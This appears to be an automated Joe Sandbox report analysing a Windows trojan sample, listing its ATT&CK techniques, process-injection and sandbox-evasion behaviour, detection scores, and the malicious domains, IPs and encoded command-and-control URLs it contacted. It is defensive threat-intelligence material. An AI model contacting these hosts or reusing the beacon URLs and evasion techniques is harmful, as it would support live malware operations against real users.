          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385308 Sample: s6G3ZtvHZg.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 33 www.ux300e.com 2->33 35 www.rosewoodcibubur.com 2->35 37 3 other IPs or domains 2->37 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 6 other signatures 2->51 11 s6G3ZtvHZg.exe 3 2->11         started        signatures3 process4 file5 31 C:\Users\user\AppData\...\s6G3ZtvHZg.exe.log, ASCII 11->31 dropped 63 Tries to detect virtualization through RDTSC time measurements 11->63 65 Injects a PE file into a foreign processes 11->65 15 s6G3ZtvHZg.exe 11->15         started        18 s6G3ZtvHZg.exe 11->18         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 15->67 69 Maps a DLL or memory area into another process 15->69 71 Sample uses process hollowing technique 15->71 73 Queues an APC in another process (thread injection) 15->73 20 explorer.exe 15->20 injected process9 dnsIp10 39 www.moretuantired.com 81.17.18.198, 49718, 80 PLI-ASCH Switzerland 20->39 41 www.theartsutra.com 142.111.76.118, 49735, 80 EGIHOSTINGUS United States 20->41 43 13 other IPs or domains 20->43 53 System process connects to network (likely due to code injection or exploit) 20->53 55 Performs DNS queries to domains with low reputation 20->55 24 help.exe 20->24         started        signatures11 process12 signatures13 57 Modifies the context of a thread in another process (thread injection) 24->57 59 Maps a DLL or memory area into another process 24->59 61 Tries to detect virtualization through RDTSC time measurements 24->61 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          s6G3ZtvHZg.exe28%VirustotalBrowse
          s6G3ZtvHZg.exe25%ReversingLabsWin32.Trojan.AgentTesla
          s6G3ZtvHZg.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.s6G3ZtvHZg.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          hotlightexpens.fun0%VirustotalBrowse
          www.betbonusuk.com0%VirustotalBrowse
          loktantratvnews.com0%VirustotalBrowse
          www.getboostphlo.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          www.okitmall.com/iu4d/0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.betbonusuk.com/iu4d/?uVjL=M6NHp&J6A=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT4EZiZV5QP8ot7STQ==0%Avira URL Cloudsafe
          http://www.warungjitu.com/iu4d/?uVjL=M6NHp&J6A=k0teHmEV2/zmOBpTxqI3H5Y5oaIRcTZxO4xmkSNbfQsiDPlSSPS4pf83qXUKBn/nYITInLUVzg==0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.theartsutra.com/iu4d/?J6A=/9OusRTTk+V39FQseUb+U2Ojje2+Fc0M9rZrn6A+Wz352TzRXVRSZ625FgSAuh9Pz9OXstBPtg==&uVjL=M6NHp0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.okitmall.com/iu4d/?uVjL=M6NHp&J6A=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrMOHcRpnHSJ7V9dZA==0%Avira URL Cloudsafe
          http://www.moretuantired.com/iu4d/?J6A=t0/ehB6/LVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit/5rlSGcY6Hhw179fg+WUV7s8SGg==&uVjL=M6NHp0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.appearwood.club/iu4d/?uVjL=M6NHp&J6A=quJ3uSLzhXOR+OCBqveBVSLwWtpx0cb154Cx1Wq/f+1xYAHW6pDvZEyzwff3Do7t5v8+AMWbMw==0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.weluvweb.com/iu4d/?J6A=p+YVWX5eE4Rg8cIpgLWCUqreCa5cO9ffVLN3OauOR6vO7HZOR4KqCsCqkB1fyJC1oU39P3kn3g==&uVjL=M6NHp0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.emmajanetracy.com/iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A==0%Avira URL Cloudsafe
          http://www.chestfreezersale.xyz/iu4d/?uVjL=M6NHp&J6A=A35kX2qXHT11q/n/cs4iUbUQYnF9cz7N4ymZ2B1O+tarurGCDYOUJTJ/gp5jdduweflW0nZeQg==0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
          		3.13.255.157
          		truefalse
            		high
            hotlightexpens.fun
            		52.206.71.220
            		truetrueunknown
            www.betbonusuk.com
            		104.21.7.67
            		truetrueunknown
            loktantratvnews.com
            		148.66.136.150
            		truetrueunknown
            www.getboostphlo.com
            		172.67.219.254
            		truefalseunknown
            www.moretuantired.com
            		81.17.18.198
            		truetrue
              		unknown
              www.weluvweb.com
              		52.56.126.26
              		truetrue
                		unknown
                www.ux300e.com
                		52.58.78.16
                		truetrue
                  		unknown
                  emmajanetracy.com
                  		192.0.78.25
                  		truetrue
                    		unknown
                    www.okitmall.com
                    		15.165.26.252
                    		truetrue
                      		unknown
                      www.theartsutra.com
                      		142.111.76.118
                      		truetrue
                        		unknown
                        www.chestfreezersale.xyz
                        		172.67.130.43
                        		truetrue
                          		unknown
                          www.loktantratvnews.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.appearwood.club
                            		unknown
                            		unknowntrue
                              		unknown
                              www.warungjitu.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.rosewoodcibubur.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.omxpro.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.peridot.website
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.emmajanetracy.com
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        www.okitmall.com/iu4d/true
                                        • Avira URL Cloud: safe
                                        		low
                                        http://www.betbonusuk.com/iu4d/?uVjL=M6NHp&J6A=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT4EZiZV5QP8ot7STQ==true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.warungjitu.com/iu4d/?uVjL=M6NHp&J6A=k0teHmEV2/zmOBpTxqI3H5Y5oaIRcTZxO4xmkSNbfQsiDPlSSPS4pf83qXUKBn/nYITInLUVzg==true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.theartsutra.com/iu4d/?J6A=/9OusRTTk+V39FQseUb+U2Ojje2+Fc0M9rZrn6A+Wz352TzRXVRSZ625FgSAuh9Pz9OXstBPtg==&uVjL=M6NHptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.okitmall.com/iu4d/?uVjL=M6NHp&J6A=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrMOHcRpnHSJ7V9dZA==true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.moretuantired.com/iu4d/?J6A=t0/ehB6/LVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit/5rlSGcY6Hhw179fg+WUV7s8SGg==&uVjL=M6NHptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.appearwood.club/iu4d/?uVjL=M6NHp&J6A=quJ3uSLzhXOR+OCBqveBVSLwWtpx0cb154Cx1Wq/f+1xYAHW6pDvZEyzwff3Do7t5v8+AMWbMw==true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.weluvweb.com/iu4d/?J6A=p+YVWX5eE4Rg8cIpgLWCUqreCa5cO9ffVLN3OauOR6vO7HZOR4KqCsCqkB1fyJC1oU39P3kn3g==&uVjL=M6NHptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.emmajanetracy.com/iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A==true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.chestfreezersale.xyz/iu4d/?uVjL=M6NHp&J6A=A35kX2qXHT11q/n/cs4iUbUQYnF9cz7N4ymZ2B1O+tarurGCDYOUJTJ/gp5jdduweflW0nZeQg==true
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.272051627.0000000006840000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.apache.org/licenses/LICENSE-2.0s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.coms6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designersGs6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designers/?s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.founder.com.cn/cn/bThes6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers?s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.tiro.comexplorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.goodfont.co.krs6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.csss6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.carterandcone.comls6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.sajatypeworks.coms6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.typography.netDs6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers/cabarga.htmlNs6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.founder.com.cn/cn/cThes6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.galapagosdesign.com/staff/dennis.htms6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://fontfabrik.coms6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.founder.com.cn/cns6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers/frere-jones.htmls6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.jiyu-kobo.co.jp/s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.galapagosdesign.com/DPleases6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers8s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.fonts.coms6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.sandoll.co.krs6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.urwpp.deDPleases6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.zhongyicts.com.cns6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/names6G3ZtvHZg.exe, 00000000.00000002.252345146.00000000028D1000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.sakkal.coms6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown

                                                                  Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  104.21.7.67
                                                                  		www.betbonusuk.comUnited States
                                                                  		13335CLOUDFLARENETUStrue
                                                                  192.0.78.25
                                                                  		emmajanetracy.comUnited States
                                                                  		2635AUTOMATTICUStrue
                                                                  142.111.76.118
                                                                  		www.theartsutra.comUnited States
                                                                  		18779EGIHOSTINGUStrue
                                                                  15.165.26.252
                                                                  		www.okitmall.comUnited States
                                                                  		16509AMAZON-02UStrue
                                                                  172.67.130.43
                                                                  		www.chestfreezersale.xyzUnited States
                                                                  		13335CLOUDFLARENETUStrue
                                                                  81.17.18.198
                                                                  		www.moretuantired.comSwitzerland
                                                                  		51852PLI-ASCHtrue
                                                                  52.206.71.220
                                                                  		hotlightexpens.funUnited States
                                                                  		14618AMAZON-AESUStrue
                                                                  52.56.126.26
                                                                  		www.weluvweb.comUnited States
                                                                  		16509AMAZON-02UStrue
                                                                  3.13.255.157
                                                                  		prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comUnited States
                                                                  		16509AMAZON-02USfalse

                                                                  General Information

                                                                  Joe Sandbox Version:31.0.0 Emerald
                                                                  Analysis ID:385308
                                                                  Start date:12.04.2021
                                                                  Start time:10:01:30
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 12m 40s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Sample file name:s6G3ZtvHZg.exe
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:33
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:1
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.evad.winEXE@9/1@16/9
                                                                  EGA Information:Failed
                                                                  HDC Information:
                                                                  • Successful, ratio: 9.7% (good quality ratio 8.6%)
                                                                  • Quality average: 73.3%
                                                                  • Quality standard deviation: 32.1%
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 78
                                                                  • Number of non-executed functions: 154
                                                                  Cookbook Comments:
                                                                  • Adjust boot time
                                                                  • Enable AMSI
                                                                  • Found application associated with file extension: .exe
                                                                  Warnings:
                                                                  Show All
                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.50.102.62, 92.122.145.220, 184.30.24.56, 168.61.161.212, 13.88.21.125, 20.82.209.183, 13.64.90.137, 92.122.213.194, 92.122.213.247, 2.16.218.147, 2.16.218.169, 104.42.151.234, 172.67.202.111, 104.21.90.158, 104.43.193.48, 52.155.217.156, 20.54.26.129, 104.43.139.144, 52.255.188.83
                                                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www.omxpro.com.cdn.cloudflare.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  10:02:33API Interceptor1x Sleep call for process: s6G3ZtvHZg.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  104.21.7.67AAXIFJn78w.exeGet hashmaliciousBrowse
                                                                  • www.betbonusuk.com/iu4d/?ETF8=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbQUHFSVt0xyq&URiPe=00DP1LExV2xHZfdP
                                                                  fNiff08dxi.exeGet hashmaliciousBrowse
                                                                  • www.betbonusuk.com/iu4d/?GFNDG=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbQUtailtwz6q&EHL0Sj=UvS0
                                                                  192.0.78.25g2qwgG2xbe.exeGet hashmaliciousBrowse
                                                                  • www.micheldrake.com/p2io/?Ezut_6Ph=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZx/uILlcnE&lhuLO=TxllZ2B
                                                                  12042021493876783,xlsx.exeGet hashmaliciousBrowse
                                                                  • www.thevillaflora.com/hw6d/?NTxxLxi=N8T6HUVrx9rRdb/j5XhVNb6z86Vd/RUNSBbCMa2WOSBZ+Hf+0g8ju4CxDHwnLMWYR763luo+iQ==&Cj9LK=9rjlL0C
                                                                  Customer-100912288113.xlsxGet hashmaliciousBrowse
                                                                  • www.micheldrake.com/p2io/?YPxxw=JxlLiTVHLV_&4h=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==
                                                                  vbc.exeGet hashmaliciousBrowse
                                                                  • www.regalparkllc.com/nnmd/?VRNp=wBZl4vkh1&MvdD=tTl8v8g035m6yKE51UQNVvYPTgelaUE7gWj9K32eZH50WSszu74cxmO0I8K07RzhCUDK
                                                                  RFQ-V-SAM-0321D056-DOC.exeGet hashmaliciousBrowse
                                                                  • www.619savage.store/uwec/?CZ6=7nExZbW&v2=UXtrAnkUbxIt7Da+co89vc/yvelnirGGdixyijtvmiG0dXcVjZHX+cHMX+KvBOjcxYq/
                                                                  yQh96Jd6TZ.exeGet hashmaliciousBrowse
                                                                  • www.longdoggy.net/vu9b/?OV0xlV=NeJ6fTW54FiVLomARoXtZYU3dCbrOkLIBtzKWj45EW4cSvDsCI/Ad3ky2rZtS/Pp2iNH&wh=jL0xYFb0mbwHi
                                                                  g0g865fQ2S.exeGet hashmaliciousBrowse
                                                                  • www.micheldrake.com/p2io/?4h3=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZx/uILlcnE&vTapK=LJBpc8p
